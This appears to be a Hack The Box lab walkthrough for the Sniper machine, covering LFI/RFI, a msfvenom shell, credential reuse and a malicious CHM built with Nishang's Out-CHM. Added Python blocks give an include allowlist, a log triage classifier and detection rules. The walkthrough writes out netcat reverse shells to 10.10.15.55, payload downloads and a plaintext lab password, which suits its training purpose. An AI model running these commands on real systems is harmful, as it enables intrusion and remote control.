19. Hack The Box. Level Medium: Sniper Walkthrough. RFI and a Malicious CHM Document

19 December 2024 5 minutes Author: Lady Liberty

If you are interested in penetration testing or want to improve your ethical hacking skills, Hack The Box’s Sniper Virtual Machine is a great challenge for you. In this article, we will take a detailed look at the entire process, from the Recon phase to escalating privileges to the admin level.

Sniper walkthrough using RFI and a malicious CHM document

This continues our series of solutions to machines from the HackTheBox platform. The material may be useful to anyone developing their skills in information security. The article covers exploitation of RFI, bypassing the blocking of the meterpreter shell, and creating a malicious CHM document.

Connection to the lab is via VPN. It is recommended not to use a work computer or a device holding important data, since you will be connecting to a private network shared with experienced information security specialists.

Recon

This machine has the IP address 10.10.10.151, which we add to /etc/hosts.

10.10.10.151    sniper.htb

First, a scan of open ports is performed. To avoid the lengthy process of checking all ports with nmap, masscan is used for the initial scan. This tool scans all TCP and UDP ports through the tun0 interface at a rate of 1000 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.151 --rate=1000

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A sniper.htb -p80,135,139,445

There are 4 open ports on the host. Let's find out what the web server can give us.

The first three links are empty, but the other two lead to the blog and the authorization (login) pages.

The page parameter immediately suggests LFI (Local File Inclusion). To test for it, we try to read a system file that is readable on any host, for example hosts (this file exists on both Linux and Windows).

The assumption is confirmed: LFI (Local File Inclusion) is present.

Entry Point

There is also an opportunity to test for RFI (Remote File Inclusion). For this, a test file is created that will be used for further investigation of the vulnerability.

To deploy a local SAMBA SMB server, you need to make the appropriate configurations to the /etc/samba/smb.conf file. In the configuration, you need to specify the path to the desired directory and grant permissions for access on behalf of the guest.

Start the smbd service.

service smbd start

Requesting the share path through the include parameter gives a positive result: the file on our share is included.
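As an added example that is not part of the original walkthrough, the following Python models the fix for both the LFI found above and the SMB-based RFI just confirmed. The include parameter (called lang here, a hypothetical name), the allowlist and the access-log lines are all constructed; 10.10.15.55 is the tester's address from the text. The value becomes an allowlist key rather than a path, and a classifier triages values seen in the web server's log by the vector they would use. A UNC path is an ordinary filesystem path to PHP on Windows, so allow_url_include=Off stops the http:// vector but not the \\host\share one; the allowlist, and egress filtering of outbound SMB from the web server, do.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed allowlist: the only values the include parameter may select, mapped to real files.
ALLOWED_PAGES = {"blog": "blog.php", "login": "login.php", "index": "index.php"}
PARAM = "lang"  # hypothetical name of the vulnerable include parameter

URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)     # http://, php://, data:// ...
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")           # \\host\share\file or //host/share/file
ABS_RE = re.compile(r"^([a-z]:[\\/]|[\\/])", re.I)        # C:\... or \... (drive-relative)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")      # a ".." path segment


def classify_include_value(value: str) -> str:
    """Label an include-parameter value by the vector it would use on a PHP/Windows host."""
    if URL_RE.search(value):
        return "url"        # only works when allow_url_include=On
    if UNC_RE.search(value):
        return "unc"        # a local path to the OS: allow_url_include does not help
    if ABS_RE.search(value):
        return "absolute"   # any file the web server account can read
    if TRAVERSAL_RE.search(value):
        return "traversal"  # classic LFI, e.g. ..\..\Windows\System32\drivers\etc\hosts
    return "plain"


def resolve_include(value: str) -> str:
    """Hardened replacement for include($_GET[PARAM]): the value is a dictionary key, never a path."""
    page = ALLOWED_PAGES.get(value)
    if page is None:
        raise ValueError(f"rejected include value {value!r} ({classify_include_value(value)})")
    return page


LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')


def triage_access_log(lines):
    """Return (client, decoded value, vector) for each request whose include value is not plain."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(PARAM, []):
            vector = classify_include_value(value)
            if vector != "plain":
                hits.append((client, value, vector))
    return hits


# Constructed access-log lines in Apache common format.
SAMPLE_LOG = [
    '10.10.14.3 - - [19/Dec/2024:10:00:01 +0000] "GET /blog/?lang=blog HTTP/1.1" 200 2048',
    '10.10.15.55 - - [19/Dec/2024:10:00:07 +0000] "GET /blog/?lang=..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824',
    '10.10.15.55 - - [19/Dec/2024:10:00:20 +0000] "GET /blog/?lang=%5C%5C10.10.15.55%5Cshare%5Ctest.php HTTP/1.1" 200 41',
    '10.10.14.3 - - [19/Dec/2024:10:00:25 +0000] "GET /login.php HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for client, value, vector in triage_access_log(SAMPLE_LOG):
        print(f"{client}\t{vector}\t{value}")
```

Running the block prints the two suspicious requests (traversal, then unc) from 10.10.15.55; the allowlist rejects both values with the same label, so the application and the detection agree on what is acceptable.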

Now we deliver the payload. We create it with msfvenom, then start the listener.

We request the file through the include, and the listener receives a connection.

Since the site has a login page, there is a chance of finding some credentials. The current working directory is the blog directory.

We download everything that is in the user directory.

While browsing all files on the local host, database connection credentials were discovered.

USER

To enumerate the users on the system, the usual commands were attempted. However, executing any command through meterpreter drops the connection. This may indicate that the cmd command processor is blocked, in particular when arguments are passed with the (-a) parameter.

execute -f powershell -a "net users" -i -H

Now let’s try to execute the command in the context of this user. To do this, we will pass the following script to powershell as a parameter.

execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { whoami }" -i -H

Let’s download netcat to the host. To do this, we’ll start an HTTP server in the directory with it.

python3 -m http.server 80

Let’s download.

execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { iwr 10.10.15.55/nc -o C:\\Users\\Chris\\Documents\\nc.exe }" -i -H

Now we run netcat, connect, and get a user session.

execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 6543}" -i -H
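The three execute calls above leave a distinctive trail in PowerShell script block logging (Event ID 4104): a plaintext password turned into a PSCredential, Invoke-Command run against the host's own name with that credential, a download to disk, and netcat spawning powershell. As an added example that is not part of the original article, this Python scans constructed 4104-style records for those shapes. The record format, the account name SNIPER\webapp and the redacted password are assumptions; the command text follows the walkthrough.

```python
import re

# Detection rules over the ScriptBlockText field of PowerShell Event ID 4104 records.
RULES = [
    ("plaintext_credential",
     re.compile(r"ConvertTo-SecureString\b.*-AsPlainText.*\bPSCredential\b", re.I)),
    ("remoting_with_credential",
     re.compile(r"Invoke-Command\b.*-Credential\b", re.I)),
    ("download_to_disk",
     re.compile(r"\b(?:iwr|Invoke-WebRequest|wget|curl)\b.*\s-o(?:utfile)?\b", re.I)),
    ("shell_exec_via_netcat",
     re.compile(r"\bnc(?:64)?\.exe\b.*\s-e\s+(?:powershell|cmd)\b", re.I)),
]


def parse_event(line: str) -> dict:
    """Parse one constructed 'RecordId=..|User=..|ScriptBlockText=..' record."""
    record, user, script = line.split("|", 2)
    return {"record": int(record.split("=", 1)[1]),
            "user": user.split("=", 1)[1],
            "script": script.split("=", 1)[1]}


def scan_script_blocks(lines):
    """One finding per record that trips at least one rule; rule names are listed in RULES order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = [name for name, rx in RULES if rx.search(ev["script"])]
        if hits:
            findings.append({"record": ev["record"], "user": ev["user"], "rules": hits})
    return findings


# Constructed records. The credential-building prefix mirrors the walkthrough; the password is
# redacted here, and SNIPER\webapp is an assumed name for the account the web shell runs as.
_CRED = (r"$username = 'SNIPER\Chris' ; $password = '<redacted>' ; "
         r"$securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; "
         r"$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; "
         r"Invoke-Command -ComputerName SNIPER -Credential $credential -ScriptBlock ")
SAMPLE_EVENTS = [
    r"RecordId=101|User=SNIPER\webapp|ScriptBlockText=Get-ChildItem C:\inetpub\wwwroot\blog",
    r"RecordId=102|User=SNIPER\webapp|ScriptBlockText=" + _CRED + "{ whoami }",
    r"RecordId=103|User=SNIPER\webapp|ScriptBlockText=" + _CRED
    + r"{ iwr 10.10.15.55/nc -o C:\Users\Chris\Documents\nc.exe }",
    r"RecordId=104|User=SNIPER\webapp|ScriptBlockText=" + _CRED
    + r"{ C:\Users\Chris\Documents\nc.exe -e powershell 10.10.15.55 6543 }",
]

if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_EVENTS):
        print(f["record"], f["user"], ", ".join(f["rules"]))
```

Script block logging must be enabled for 4104 to exist at all; where it is not, the stronger signal is the process tree, since execute -f powershell from a web shell makes the web server worker process the parent of powershell.exe, which a normal IIS host never does.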

ROOT

After some searching through the directories, a file in CHM format was discovered. Its purpose remains unclear at this stage.

A note was found in the Docs folder on drive C: stating that the user has no PHP skills and should prepare documentation. The documents should be left in the same folder.

To create a malicious CHM file, HTML Help Workshop is installed first, and then the Out-CHM utility from the Nishang package is used to generate the required file.

Out-CHM -Payload "C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 8765" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Fetching the created file into the target directory on the remote host completes successfully.

wget http://10.10.15.55/doc.chm -o C:\Docs\doc.chm

The result is a session with administrator rights.
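The escalation works because a low-privileged user can drop a CHM into a folder whose contents an administrator opens. A first defensive step is to know which files in such a drop folder are CHM containers at all, by content rather than by extension. As an added example that is not part of the original article, the Python below parses the fixed ITSF header that every CHM starts with (magic, version, header length, language ID, the two header-section entries and, for version 3, the content-section offset), flags structural inconsistencies, and lists files that are CHM whatever they are named. The sample bytes are constructed; the header layout and GUID values follow the publicly documented CHM format. The check establishes file type and integrity only: whether a CHM runs anything when opened requires inspecting its decompressed topics, which this does not do.

```python
import struct

ITSF_MAGIC = b"ITSF"
# Signature GUIDs carried at 0x18 and 0x28 of every ITSF header (public CHM format notes).
ITSF_GUID1 = bytes.fromhex("10FD017CAA7BD0119E0C00A0C922E6EC")  # {7C01FD10-7BAA-11D0-9E0C-00A0C922E6EC}
ITSF_GUID2 = bytes.fromhex("11FD017CAA7BD0119E0C00A0C922E6EC")  # {7C01FD11-7BAA-11D0-9E0C-00A0C922E6EC}


def parse_itsf_header(data: bytes) -> dict:
    """Parse the fixed ITSF header and report structural problems; raises if the magic is absent."""
    if len(data) < 0x58 or data[:4] != ITSF_MAGIC:
        raise ValueError("not an ITSF (CHM) container")
    version, header_len, _unknown, timestamp, lang_id = struct.unpack_from("<5I", data, 4)
    # Two header-section entries at 0x38: (offset, length) as 64-bit little-endian pairs.
    sections = [struct.unpack_from("<QQ", data, 0x38 + 16 * i) for i in range(2)]
    content_offset = (struct.unpack_from("<Q", data, 0x58)[0]
                      if version >= 3 and len(data) >= 0x60 else None)
    problems = []
    if header_len > len(data):
        problems.append("header length exceeds file size")
    for i, (off, length) in enumerate(sections):
        if off + length > len(data):
            problems.append(f"section {i} extends past end of file")
    if content_offset is not None and content_offset > len(data):
        problems.append("content section offset past end of file")
    if data[0x18:0x28] != ITSF_GUID1 or data[0x28:0x38] != ITSF_GUID2:
        problems.append("unexpected header GUIDs")
    return {"version": version, "header_length": header_len, "timestamp": timestamp,
            "language_id": lang_id, "sections": sections,
            "content_offset": content_offset, "problems": problems}


def looks_like_chm(data: bytes) -> bool:
    """File-type decision by magic bytes, independent of the file name."""
    return data[:4] == ITSF_MAGIC


def find_chm_by_content(files: dict) -> list:
    """Names of files (name -> bytes) whose content is CHM, whatever their extension says."""
    return [name for name, data in files.items() if looks_like_chm(data)]


def _build_sample_chm() -> bytes:
    """Constructed minimal ITSF header (v3, language 0x0409) plus two placeholder header sections."""
    hdr = bytearray(0x60)
    hdr[0:4] = ITSF_MAGIC
    struct.pack_into("<5I", hdr, 4, 3, 0x60, 1, 0x6764B540, 0x0409)  # version, hdr len, 1, timestamp, lang
    hdr[0x18:0x28] = ITSF_GUID1
    hdr[0x28:0x38] = ITSF_GUID2
    struct.pack_into("<4Q", hdr, 0x38, 0x60, 0x18, 0x78, 0x20)  # section 0 at 0x60, section 1 at 0x78
    struct.pack_into("<Q", hdr, 0x58, 0x98)                      # content section 0 starts at end of data
    return bytes(hdr) + bytes(0x38)


SAMPLE_CHM = _build_sample_chm()

if __name__ == "__main__":
    print(parse_itsf_header(SAMPLE_CHM))
    print(find_chm_by_content({"doc.chm": SAMPLE_CHM, "notes.txt": SAMPLE_CHM, "readme.txt": b"plain"}))
```

Run over a folder such as C:\Docs, the content check catches a CHM renamed to look like a text document, and the problems list separates truncated or hand-edited containers from well-formed ones. The real mitigations sit beside it: write access to the folder restricted to the people who should publish documentation, and CHM from untrusted sources treated as executable content rather than as a document.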

Conclusion

The article describes the Sniper VM walkthrough on the Hack The Box platform, including the detection and exploitation of LFI and RFI vulnerabilities, bypassing shell blocking, and creating a malicious CHM file for privilege escalation. The article emphasizes the importance of properly securing servers, configuring file access, and verifying the security of web applications.
